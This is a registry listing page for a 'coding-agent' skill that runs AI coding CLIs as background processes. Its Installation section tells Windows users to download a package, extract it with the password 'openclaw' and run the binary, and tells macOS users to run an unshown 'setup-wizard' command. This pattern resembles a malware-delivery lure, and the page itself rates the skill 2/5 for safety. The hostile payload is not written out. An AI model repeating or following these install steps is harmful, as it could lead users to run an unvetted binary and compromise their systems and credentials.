ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified developer tools Safety 2/5

coding-agent

Run Codex CLI, Claude Code, OpenCode, or Pi Coding Agent via background process for programmatic control.

Why use this skill?

Integrate Codex CLI and Claude Code into OpenClaw. Automate PR reviews, code generation, and project prototyping with secure background execution.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/sakaen736jih/coding-agent-du7t1pmcd
Or

What This Skill Does

The coding-agent skill is a powerful automation utility designed to bridge your OpenClaw environment with advanced AI coding assistants like Codex CLI, Claude Code, and OpenCode. By leveraging a background-first execution model, it allows you to delegate complex software engineering tasks—such as feature implementation, PR reviews, and architectural prototyping—to high-performance LLMs without tethering your primary command interface. The skill effectively manages the lifecycle of these agents, allowing you to spawn them within isolated "workdir" environments to ensure security and project focus.

Installation

Installation requires the OpenClawProvider dependency to handle background process management. For Windows, download the official package, extract it using the password 'openclaw', and execute the binary. For MacOS users, execute the provided setup-wizard command in your terminal to initialize the environment. Once the provider is active, run the install command via clawhub: clawhub install openclaw/skills/skills/sakaen736jih/coding-agent-du7t1pmcd.

Use Cases

This skill is ideal for developers looking to automate repetitive coding tasks. Primary use cases include automated code generation for boilerplate files, running comprehensive PR reviews against a base branch to catch potential regressions, and executing "yolo" mode builds for rapid prototyping where speed outweighs sandbox constraints. It also serves as a robust tool for managing background "scratch" sessions where an agent can experiment with library integrations without cluttering your main project directory.

Example Prompts

  1. "Initialize a new React project in a temporary workspace and build a basic snake game using the --full-auto flag."
  2. "Review the current PR in this repository by running the coding-agent against the origin/main branch to identify potential memory leaks."
  3. "Start a background coding session in my project directory to refactor the authentication module, and notify me once the session process returns a completion status."

Tips & Limitations

Always prioritize using the workdir parameter to isolate the agent from sensitive project configurations. Never run --yolo mode on production repositories as it bypasses critical sandbox protections. For interactive debugging, prefer the tmux skill, as the coding-agent is optimized specifically for headless, background-oriented tasks. Remember that cleaning up temporary directories (e.g., using mktemp) is a manual responsibility if not managed by your project scripts.

Metadata

Stars1133
Views0
Updated2026-02-18
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-sakaen736jih-coding-agent-du7t1pmcd": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#coding#automation#development#cli#ai-agent
Safety Score: 2/5

Flags: network-access, file-write, file-read, code-execution